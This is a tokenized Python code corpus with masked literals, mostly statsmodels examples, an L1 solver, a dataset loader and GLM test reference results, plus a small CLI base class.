<s> import abc <EOL> import collections <EOL> import logging <EOL> import sys <EOL> from six . moves import http_client <EOL> import repositorytools <EOL> logger = logging . getLogger ( sys . argv [ <NUM_LIT:0> ] ) <EOL> def configure_logging ( debug ) : <EOL> if debug : <EOL> logging . basicConfig ( level = logging . DEBUG ) <EOL> http_client . HTTPConnection . debuglevel = <NUM_LIT:1> <EOL> requests_log = logging . getLogger ( "<STR_LIT>" ) <EOL> requests_log . setLevel ( logging . INFO ) <EOL> requests_log . propagate = True <EOL> else : <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> class CLI ( collections . Callable ) : <EOL> """<STR_LIT>""" <EOL> __metaclass__ = abc . ABCMeta <EOL> @ abc . abstractmethod <EOL> def _get_parser ( self ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __init__ ( self ) : <EOL> self . parser = self . _get_parser ( ) <EOL> self . parser . add_argument ( "<STR_LIT>" , "<STR_LIT>" , action = "<STR_LIT:store_true>" , dest = "<STR_LIT>" , default = False , <EOL> help = "<STR_LIT>" ) <EOL> self . repository = None <EOL> def run ( self , args = None ) : <EOL> args_namespace = self . parser . parse_args ( args ) <EOL> configure_logging ( args_namespace . debug ) <EOL> used_args = args or sys . argv [ <NUM_LIT:1> : ] <EOL> logger . info ( '<STR_LIT>' , sys . argv [ <NUM_LIT:0> ] , str ( used_args ) ) <EOL> """<STR_LIT>""" <EOL> self . repository = repositorytools . repository_client_factory ( ) <EOL> return args_namespace . func ( args_namespace ) <EOL> def __call__ ( self , * args ) : <EOL> return self . run ( * args ) </s>
<s> """<STR_LIT>""" <EOL> from scipy import stats <EOL> from matplotlib import pyplot as plt <EOL> import statsmodels . api as sm <EOL> data = sm . datasets . longley . load ( ) <EOL> data . exog = sm . add_constant ( data . exog , prepend = True ) <EOL> mod_fit = sm . OLS ( data . endog , data . exog ) . fit ( ) <EOL> res = mod_fit . resid <EOL> left = - <NUM_LIT> <EOL> fig = plt . figure ( ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> sm . graphics . qqplot ( res , ax = ax ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , '<STR_LIT>' , verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> sm . graphics . qqplot ( res , line = '<STR_LIT:s>' , ax = ax ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , "<STR_LIT>" , verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> sm . graphics . qqplot ( res , line = '<STR_LIT>' , fit = True , ax = ax ) <EOL> ax . set_xlim ( - <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , "<STR_LIT>" , verticalalignment = '<STR_LIT>' ) <EOL> txt . set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> ax = fig . add_subplot ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> ) <EOL> sm . graphics . qqplot ( res , dist = stats . t , line = '<STR_LIT>' , fit = True , ax = ax ) <EOL> ax . set_xlim ( - <NUM_LIT:2> , <NUM_LIT:2> ) <EOL> top = ax . get_ylim ( ) [ <NUM_LIT:1> ] * <NUM_LIT> <EOL> txt = ax . text ( left , top , "<STR_LIT>" , <EOL> verticalalignment = '<STR_LIT>' ) <EOL> txt . 
set_bbox ( dict ( facecolor = '<STR_LIT:k>' , alpha = <NUM_LIT:0.1> ) ) <EOL> fig . tight_layout ( ) <EOL> plt . gcf ( ) <EOL> import numpy as np <EOL> x = np . random . normal ( loc = <NUM_LIT> , scale = <NUM_LIT> , size = <NUM_LIT> ) <EOL> y = np . random . normal ( loc = <NUM_LIT> , scale = <NUM_LIT> , size = <NUM_LIT> ) <EOL> pp_x = sm . ProbPlot ( x , fit = True ) <EOL> pp_y = sm . ProbPlot ( y , fit = True ) <EOL> fig2 = pp_x . probplot ( exceed = True ) <EOL> fig3 = pp_x . qqplot ( other = pp_y , line = '<STR_LIT>' ) <EOL> fig4 = pp_x . ppplot ( other = pp_y , line = '<STR_LIT>' ) </s>
<s> from __future__ import print_function <EOL> import statsmodels . api as sm <EOL> import statsmodels . formula . api as smf <EOL> star98 = sm . datasets . star98 . load_pandas ( ) . data <EOL> formula = '<STR_LIT>' <EOL> dta = star98 [ [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ] <EOL> endog = dta [ '<STR_LIT>' ] / ( dta [ '<STR_LIT>' ] + dta . pop ( '<STR_LIT>' ) ) <EOL> del dta [ '<STR_LIT>' ] <EOL> dta [ '<STR_LIT>' ] = endog <EOL> mod1 = smf . glm ( formula = formula , data = dta , family = sm . families . Binomial ( ) ) . fit ( ) <EOL> mod1 . summary ( ) <EOL> def double_it ( x ) : <EOL> return <NUM_LIT:2> * x <EOL> formula = '<STR_LIT>' <EOL> mod2 = smf . glm ( formula = formula , data = dta , family = sm . families . Binomial ( ) ) . fit ( ) <EOL> mod2 . summary ( ) <EOL> print ( mod1 . params [ <NUM_LIT:1> ] ) <EOL> print ( mod2 . params [ <NUM_LIT:1> ] * <NUM_LIT:2> ) </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from scipy . optimize import fmin_slsqp <EOL> import statsmodels . base . l1_solvers_common as l1_solvers_common <EOL> def fit_l1_slsqp ( <EOL> f , score , start_params , args , kwargs , disp = False , maxiter = <NUM_LIT:1000> , <EOL> callback = None , retall = False , full_output = False , hess = None ) : <EOL> """<STR_LIT>""" <EOL> start_params = np . array ( start_params ) . ravel ( '<STR_LIT:F>' ) <EOL> k_params = len ( start_params ) <EOL> x0 = np . append ( start_params , np . fabs ( start_params ) ) <EOL> alpha = np . array ( kwargs [ '<STR_LIT>' ] ) . ravel ( '<STR_LIT:F>' ) <EOL> alpha = alpha * np . ones ( k_params ) <EOL> assert alpha . min ( ) >= <NUM_LIT:0> <EOL> disp_slsqp = _get_disp_slsqp ( disp , retall ) <EOL> acc = kwargs . setdefault ( '<STR_LIT>' , <NUM_LIT> ) <EOL> func = lambda x_full : _objective_func ( f , x_full , k_params , alpha , * args ) <EOL> f_ieqcons_wrap = lambda x_full : _f_ieqcons ( x_full , k_params ) <EOL> fprime_wrap = lambda x_full : _fprime ( score , x_full , k_params , alpha ) <EOL> fprime_ieqcons_wrap = lambda x_full : _fprime_ieqcons ( x_full , k_params ) <EOL> results = fmin_slsqp ( <EOL> func , x0 , f_ieqcons = f_ieqcons_wrap , fprime = fprime_wrap , acc = acc , <EOL> iter = maxiter , disp = disp_slsqp , full_output = full_output , <EOL> fprime_ieqcons = fprime_ieqcons_wrap ) <EOL> params = np . asarray ( results [ <NUM_LIT:0> ] [ : k_params ] ) <EOL> qc_tol = kwargs [ '<STR_LIT>' ] <EOL> qc_verbose = kwargs [ '<STR_LIT>' ] <EOL> passed = l1_solvers_common . qc_results ( <EOL> params , alpha , score , qc_tol , qc_verbose ) <EOL> trim_mode = kwargs [ '<STR_LIT>' ] <EOL> size_trim_tol = kwargs [ '<STR_LIT>' ] <EOL> auto_trim_tol = kwargs [ '<STR_LIT>' ] <EOL> params , trimmed = l1_solvers_common . 
do_trim_params ( <EOL> params , k_params , alpha , score , passed , trim_mode , size_trim_tol , <EOL> auto_trim_tol ) <EOL> if full_output : <EOL> x_full , fx , its , imode , smode = results <EOL> fopt = func ( np . asarray ( x_full ) ) <EOL> converged = '<STR_LIT:True>' if imode == <NUM_LIT:0> else smode <EOL> iterations = its <EOL> gopt = float ( '<STR_LIT>' ) <EOL> hopt = float ( '<STR_LIT>' ) <EOL> retvals = { <EOL> '<STR_LIT>' : fopt , '<STR_LIT>' : converged , '<STR_LIT>' : iterations , <EOL> '<STR_LIT>' : gopt , '<STR_LIT>' : hopt , '<STR_LIT>' : trimmed } <EOL> if full_output : <EOL> return params , retvals <EOL> else : <EOL> return params <EOL> def _get_disp_slsqp ( disp , retall ) : <EOL> if disp or retall : <EOL> if disp : <EOL> disp_slsqp = <NUM_LIT:1> <EOL> if retall : <EOL> disp_slsqp = <NUM_LIT:2> <EOL> else : <EOL> disp_slsqp = <NUM_LIT:0> <EOL> return disp_slsqp <EOL> def _objective_func ( f , x_full , k_params , alpha , * args ) : <EOL> """<STR_LIT>""" <EOL> x_params = x_full [ : k_params ] <EOL> x_added = x_full [ k_params : ] <EOL> return f ( x_params , * args ) + ( alpha * x_added ) . sum ( ) <EOL> def _fprime ( score , x_full , k_params , alpha ) : <EOL> """<STR_LIT>""" <EOL> x_params = x_full [ : k_params ] <EOL> return np . append ( score ( x_params ) , alpha ) <EOL> def _f_ieqcons ( x_full , k_params ) : <EOL> """<STR_LIT>""" <EOL> x_params = x_full [ : k_params ] <EOL> x_added = x_full [ k_params : ] <EOL> return np . append ( x_params + x_added , x_added - x_params ) <EOL> def _fprime_ieqcons ( x_full , k_params ) : <EOL> """<STR_LIT>""" <EOL> I = np . eye ( k_params ) <EOL> A = np . concatenate ( ( I , I ) , axis = <NUM_LIT:1> ) <EOL> B = np . concatenate ( ( - I , I ) , axis = <NUM_LIT:1> ) <EOL> C = np . concatenate ( ( A , B ) , axis = <NUM_LIT:0> ) <EOL> return C </s>
<s> """<STR_LIT>""" <EOL> __docformat__ = '<STR_LIT>' <EOL> COPYRIGHT = """<STR_LIT>""" <EOL> TITLE = __doc__ <EOL> SOURCE = """<STR_LIT>""" <EOL> DESCRSHORT = """<STR_LIT>""" <EOL> DESCRLONG = """<STR_LIT>""" <EOL> NOTE = """<STR_LIT>""" <EOL> from numpy import recfromtxt , column_stack , array <EOL> from statsmodels . datasets import utils as du <EOL> from os . path import dirname , abspath <EOL> def load ( ) : <EOL> """<STR_LIT>""" <EOL> data = _get_data ( ) <EOL> return du . process_recarray ( data , endog_idx = <NUM_LIT:0> , dtype = float ) <EOL> def load_pandas ( ) : <EOL> """<STR_LIT>""" <EOL> data = _get_data ( ) <EOL> return du . process_recarray_pandas ( data , endog_idx = <NUM_LIT:0> , dtype = float ) <EOL> def _get_data ( ) : <EOL> filepath = dirname ( abspath ( __file__ ) ) <EOL> with open ( filepath + '<STR_LIT>' , '<STR_LIT:rb>' ) as f : <EOL> data = recfromtxt ( f , delimiter = "<STR_LIT:U+002C>" , <EOL> names = True , dtype = float , usecols = ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:7> ) ) <EOL> return data </s>
<s> import numpy as np <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:3> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:4> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . 
nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:4> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . split ( ) <EOL> class Bunch ( dict ) : <EOL> def __init__ ( self , ** kw ) : <EOL> dict . __init__ ( self , kw ) <EOL> self . __dict__ = self <EOL> for i , att in enumerate ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) : <EOL> self [ att ] = self . 
params_table [ : , i ] <EOL> results_noconstraint = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:3> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:4> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> 
singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:4> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . 
split ( ) <EOL> results_noconstraint_robust = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:3> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> 
singularHmethod = "<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , np . nan , np . nan , np . nan , <EOL> np . nan , np . nan , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT:0> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . split ( ) <EOL> cov_rownames = '<STR_LIT>' . split ( ) <EOL> infocrit = np . array ( [ <EOL> <NUM_LIT:32> , np . nan , - <NUM_LIT> , <NUM_LIT:3> , <EOL> <NUM_LIT> , <NUM_LIT> ] ) <EOL> infocrit_colnames = '<STR_LIT>' . split ( ) <EOL> infocrit_rownames = '<STR_LIT:.>' . 
split ( ) <EOL> results_constraint1 = Bunch ( <EOL> params_table = params_table , <EOL> params_table_colnames = params_table_colnames , <EOL> params_table_rownames = params_table_rownames , <EOL> cov = cov , <EOL> cov_colnames = cov_colnames , <EOL> cov_rownames = cov_rownames , <EOL> infocrit = infocrit , <EOL> infocrit_colnames = infocrit_colnames , <EOL> infocrit_rownames = infocrit_rownames , <EOL> ** est <EOL> ) <EOL> est = dict ( <EOL> k_eq_model = <NUM_LIT:0> , <EOL> phi = <NUM_LIT:1> , <EOL> vf = <NUM_LIT:1> , <EOL> df = <NUM_LIT> , <EOL> df_m = <NUM_LIT:2> , <EOL> power = <NUM_LIT:0> , <EOL> canonical = <NUM_LIT:1> , <EOL> rank = <NUM_LIT:3> , <EOL> aic = <NUM_LIT> , <EOL> rc = <NUM_LIT:0> , <EOL> p = <NUM_LIT> , <EOL> chi2 = <NUM_LIT> , <EOL> ll = - <NUM_LIT> , <EOL> k_autoCns = <NUM_LIT:0> , <EOL> converged = <NUM_LIT:1> , <EOL> k_dv = <NUM_LIT:1> , <EOL> k_eq = <NUM_LIT:1> , <EOL> k = <NUM_LIT:4> , <EOL> ic = <NUM_LIT:3> , <EOL> N = <NUM_LIT:32> , <EOL> nbml = <NUM_LIT:0> , <EOL> bic = - <NUM_LIT> , <EOL> dispers_ps = <NUM_LIT> , <EOL> deviance_ps = <NUM_LIT> , <EOL> dispers_p = <NUM_LIT> , <EOL> deviance_p = <NUM_LIT> , <EOL> dispers_s = <NUM_LIT> , <EOL> deviance_s = <NUM_LIT> , <EOL> dispers = <NUM_LIT> , <EOL> deviance = <NUM_LIT> , <EOL> cmdline = "<STR_LIT>" , <EOL> cmd = "<STR_LIT>" , <EOL> predict = "<STR_LIT>" , <EOL> marginsnotok = "<STR_LIT>" , <EOL> marginsok = "<STR_LIT:default>" , <EOL> hac_lag = "<STR_LIT>" , <EOL> vcetype = "<STR_LIT>" , <EOL> vce = "<STR_LIT>" , <EOL> linkt = "<STR_LIT>" , <EOL> linkf = "<STR_LIT>" , <EOL> varfunct = "<STR_LIT>" , <EOL> varfuncf = "<STR_LIT>" , <EOL> opt1 = "<STR_LIT>" , <EOL> oim = "<STR_LIT>" , <EOL> a = "<STR_LIT:1>" , <EOL> m = "<STR_LIT:1>" , <EOL> varfunc = "<STR_LIT>" , <EOL> link = "<STR_LIT>" , <EOL> chi2type = "<STR_LIT>" , <EOL> opt = "<STR_LIT>" , <EOL> title = "<STR_LIT>" , <EOL> user = "<STR_LIT>" , <EOL> crittype = "<STR_LIT>" , <EOL> ml_method = "<STR_LIT>" , <EOL> singularHmethod = 
"<STR_LIT>" , <EOL> technique = "<STR_LIT>" , <EOL> which = "<STR_LIT>" , <EOL> depvar = "<STR_LIT>" , <EOL> properties = "<STR_LIT>" , <EOL> ) <EOL> params_table = np . array ( [ <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , np . nan , <NUM_LIT> , <EOL> <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , np . nan , <EOL> <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> np . nan , <NUM_LIT> , <NUM_LIT:0> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , np . nan , <NUM_LIT> , <NUM_LIT:0> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:9> ) <EOL> params_table_colnames = '<STR_LIT>' . split ( ) <EOL> params_table_rownames = '<STR_LIT>' . split ( ) <EOL> cov = np . array ( [ <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <EOL> <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <EOL> - <NUM_LIT> , - <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> <EOL> ] ) . reshape ( <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> cov_colnames = '<STR_LIT>' . 